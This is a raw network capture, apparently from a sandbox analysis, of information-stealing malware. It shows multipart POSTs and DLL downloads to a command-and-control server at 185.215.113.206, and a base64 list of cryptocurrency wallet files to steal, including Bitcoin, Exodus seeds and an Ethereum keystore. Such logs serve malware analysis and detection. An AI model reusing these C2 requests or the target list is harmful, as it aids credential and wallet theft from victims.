Dec 8, 2024 19:52:20.851278067 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:21.406533003 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Dec 8, 2024 19:52:21.706718922 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Dec 8, 2024 19:52:22.611049891 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:22.940967083 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:23.380896091 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 8, 2024 19:52:23.381036043 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 8, 2024 19:52:23.381063938 CET	248	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 8, 2024 19:52:23.381074905 CET	1236	IN	Data Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18 Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$
Dec 8, 2024 19:52:23.381087065 CET	1236	IN	Data Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8 Data Ascii: EE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -
Dec 8, 2024 19:52:23.381098986 CET	1236	IN	Data Raw: 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 c7 47 08 01 Data Ascii: EGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
Dec 8, 2024 19:52:23.381112099 CET	1236	IN	Data Raw: 31 e9 e8 29 f6 07 00 89 f0 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 b4 30 0a 10 31 e8 89 45 f0 68 02 01 00 00 e8 9f f7 07 00 83 c4 04 31 ff 85 c0 0f 84 fc 00 00 00 89 c6 8b 45 0c Data Ascii: 1)^_[]USWV01Eh1E=s hkhVohh !Vf.@uVuW)9wSuWT
Dec 8, 2024 19:52:23.389795065 CET	1236	IN	Data Raw: 89 cf 8b 45 f0 88 14 30 00 d3 0f b6 c3 8b 4d 10 8a 51 02 8b 4d f0 32 14 01 8b 4d d4 8b 45 e4 88 50 02 8b 5d dc 8b 45 d0 8b 55 d8 2b 55 cc 89 55 d8 83 c7 04 83 c3 04 8b 55 e0 39 d1 0f 86 c9 01 00 00 29 d1 0f 84 de 01 00 00 89 5d dc 89 7d e4 89 c8 Data Ascii: E0MQM2MEP]EU+UUU9)]}1EEMAMfo 1ff}]fn4ff`fafofrfo f[fpffpffof
Dec 8, 2024 19:52:23.389950991 CET	1236	IN	Data Raw: 88 14 18 8b 5d dc 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 18 09 f0 8b 75 d8 33 45 d4 8b 55 e8 89 04 13 8b 45 e8 83 c6 fc 83 c0 04 89 75 d8 83 fe 03 0f 87 f0 fe ff ff 8b 7d ec 01 c7 8b 55 e4 01 c2 89 c6 89 d0 01 f3 89 ca 83 7d d8 00 0f 84 03 02 Data Ascii: ]Uu3EUEu}U}]E]E8u40480u}T20ETEuE14^_[]UM1]U}f.MM
Dec 8, 2024 19:52:23.398452997 CET	1236	IN	Data Raw: 8d dc fe ff ff 8b 41 10 89 85 ac fe ff ff 89 c6 01 d6 8b 53 24 89 95 1c ff ff ff 8b 41 14 89 85 b0 fe ff ff 89 c7 11 d7 8b 41 30 89 85 d0 fe ff ff 01 c6 89 f3 8b 41 34 89 85 d4 fe ff ff 11 c7 89 7d f0 8b 71 54 31 fe 8b 51 50 31 da 89 d8 81 f6 ab Data Ascii: AS$AA0A4}qT1QP1kA+]rn<}33Ht{({,]HE]11EuUUuu11U
Dec 8, 2024 19:52:24.804982901 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:25.261904955 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 8, 2024 19:52:26.105237961 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:26.556843042 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 8, 2024 19:52:27.193073034 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:27.669580936 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 8, 2024 19:52:30.787722111 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:31.225620031 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 8, 2024 19:52:31.838928938 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:32.322158098 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:32 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 8, 2024 19:52:32.767271996 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:52:33.716032982 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:33.755595922 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="message"wallets------CAKKJKKECFIDGDHIJEGD--
Dec 8, 2024 19:52:34.202004910 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
